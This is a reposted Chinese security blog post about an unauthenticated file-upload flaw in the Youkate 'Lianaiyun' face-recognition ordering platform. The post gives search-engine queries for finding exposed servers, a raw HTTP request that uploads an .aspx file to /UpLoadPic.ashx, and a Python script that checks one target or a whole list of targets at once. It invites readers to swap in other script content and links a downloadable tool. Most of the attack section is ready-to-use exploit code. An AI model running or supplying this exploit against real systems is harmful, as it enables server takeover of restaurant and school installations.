优卡特脸爱云管理系统文件上传漏洞

admin 2024年5月11日14:10:08评论37 views字数 2698阅读8分59秒阅读模式
 
组件介绍
脸爱云是一款智慧点餐管理平台,帮助企业实现智能化管理、云端部署,并提供安全保障和定制化服务,助力企业提升管理水平和竞争力。该产品广泛应用于餐馆点餐或校企机构刷脸点单,该平台 /UpLoadPic.ashx接口处存在文件上传漏洞,未对传入文件参数进行鉴权,导致未经身份认证的攻击者可以通过此漏洞构造参数上传文件,造成后续服务器接管,具有较严重的影响后果。

搜索语法
FOFA:title=="欢迎使用脸爱云 一脸通智慧管理平台"Zoomeye:title:"欢迎使用脸爱云 一脸通智慧管理平台"

漏洞详情
优卡特脸爱云管理系统文件上传漏洞
漏洞POC
POST /UpLoadPic.ashx HTTP/1.1Host: {{Hostname}}

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36

Content-Length: 431

Accept: */*

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywt7cEu1eBdibB13u

X-Requested-With: XMLHttpRequest

------WebKitFormBoundarywt7cEu1eBdibB13uContent-Disposition: form-data; name="action"

post

------WebKitFormBoundarywt7cEu1eBdibB13uContent-Disposition: form-data; name="myPhoto"; filename="1.aspx"

Content-Type: image/png
<% response.write("123") %>
------WebKitFormBoundarywt7cEu1eBdibB13u

Content-Disposition: form-data; name="oldName"

------WebKitFormBoundarywt7cEu1eBdibB13u--

批量检测
原理:对指定ip上传post报文构造aspx文件,并通过脚本内response.write写入数据,如若想写入其他数据,请自行修改该行。如果上传成功,则返回存在漏洞,请自行进行后续测试。

使用方法:

python -u http://target_ip/Login.aspx

python -f file.txt

效果:

优卡特脸爱云管理系统文件上传漏洞
后续验证:文件上传

优卡特脸爱云管理系统文件上传漏洞
访问上传文件
优卡特脸爱云管理系统文件上传漏洞

脚本:

import requests
import argparse
 
def send_request(url):
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
        "Accept": "*/*",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Connection": "close",
        "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarywt7cEu1eBdibB13u",
        "X-Requested-With": "XMLHttpRequest"
    }
 
    data = """------WebKitFormBoundarywt7cEu1eBdibB13u
Content-Disposition: form-data; name="action"
 
post
------WebKitFormBoundarywt7cEu1eBdibB13u
Content-Disposition: form-data; name="myPhoto"; filename="hard.aspx"
Content-Type: image/png
 
<% response.write("123") %>
 
------WebKitFormBoundarywt7cEu1eBdibB13u
Content-Disposition: form-data; name="oldName"
 
 
------WebKitFormBoundarywt7cEu1eBdibB13u--"""
 
    response = requests.post(url, headers=headers, data=data)
    if response.status_code == 200:
        print(f"漏洞存在: {url},请进行后续测试")
 
 
def process_url(url):
    print(f"发送请求至 {url}")
    send_request(url)
 
def process_file(file_path):
    with open(file_path, "r") as file:
        for line in file:
            url = line.strip()
            if url:
                process_url(url)
 
def main():
    parser = argparse.ArgumentParser(description="发送报文到指定 IP 地址")
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument("-u", "--url", help="指定单个 URL 发送报文")
    group.add_argument("-f", "--file", help="指定包含 IP 地址的文本文件发送报文")
    args = parser.parse_args()
 
    if args.url:
        process_url(args.url)
    elif args.file:
        process_file(args.file)
 
if __name__ == "__main__":
    main()

工具获取

链接:https://pan.baidu.com/s/19As7d9p0zLZuqv9G7TR5FQ?pwd=geyu 提取码:geyu
链接失效请公众号后台留言联系我更新

 

原文始发于微信公众号(TimeAxis Sec):【漏洞复现】优卡特脸爱云管理系统文件上传漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月11日14:10:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   优卡特脸爱云管理系统文件上传漏洞https://cn-sec.com/archives/2727269.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息